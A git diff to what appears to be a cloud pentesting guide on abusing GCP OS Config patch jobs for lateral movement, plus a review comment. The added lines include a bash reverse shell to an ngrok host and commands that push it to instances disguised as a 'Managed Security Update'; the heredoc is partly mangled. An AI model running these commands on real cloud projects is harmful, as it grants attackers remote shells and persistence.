diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md index c1c12e128c..38cb614006 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md 
@@ -84,17 +84,41 @@ The exploit script for this method can be found [here](https://github.com/RhinoS If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. -If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json) for a patch job run: +Note that at the moment you **don't need `astAs` permission** over the SA attached to the instance. -`gcloud compute os-config patch-jobs execute --file=patch.json` +If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json)**.**\ +For a patch job run: + +{% code overflow="wrap" %} +```python +cat > /tmp/patch-job.sh <& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1 +EOF + +gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh + +# Get the generation number +gsutil ls -a gs://readable-bucket-by-sa-in-instance + +gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \ + --instance-filter-names=zones/us-central1-a/instances/ \ + --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh# \ + --reboot-config=never \ + --display-name="Managed Security Update" \ + --duration=300s +``` +{% endcode %} To deploy a patch deployment: -`gcloud compute os-config patch-deployments create my-update --file=patch.json` +```bash +gcloud compute os-config patch-deployments create ... 
+``` -Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to detect lax permissions and automatically move laterally. +The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working). -**You can also abuse this for persistence.** +**An attacker could also abuse this for persistence.** ### `compute.machineImages.setIamPolicy`
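Review bot: `astAs` in the new note line ("you **don't need `astAs` permission** over the SA attached to the instance") is a typo for `actAs` (the `iam.serviceAccounts.actAs` permission); a reader grepping for the permission name will not find it. Same hunk, a few more points: the added fence is tagged `python` but contains shell, so tag it `bash`; the heredoc that writes `/tmp/patch-job.sh` has lost its opener and body (the line reads `cat > /tmp/patch-job.sh <& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1` followed by `EOF`), so as written nothing meaningful is written to the file and `gsutil cp` uploads an empty or partial script; `--pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh#` ends in a bare `#` and `--instance-filter-names=zones/us-central1-a/instances/` ends in a bare slash, so mark both as placeholders (e.g. `patch-job.sh#<GENERATION>` and `instances/<INSTANCE_NAME>`) to match the "Get the generation number" comment above them; replacing `gcloud compute os-config patch-deployments create my-update --file=patch.json` with `gcloud compute os-config patch-deployments create ...` swaps a working command for a stub, so keep the `--file=patch.json` form or give the equivalent flags; and "could been used in the past" should read "could be used in the past".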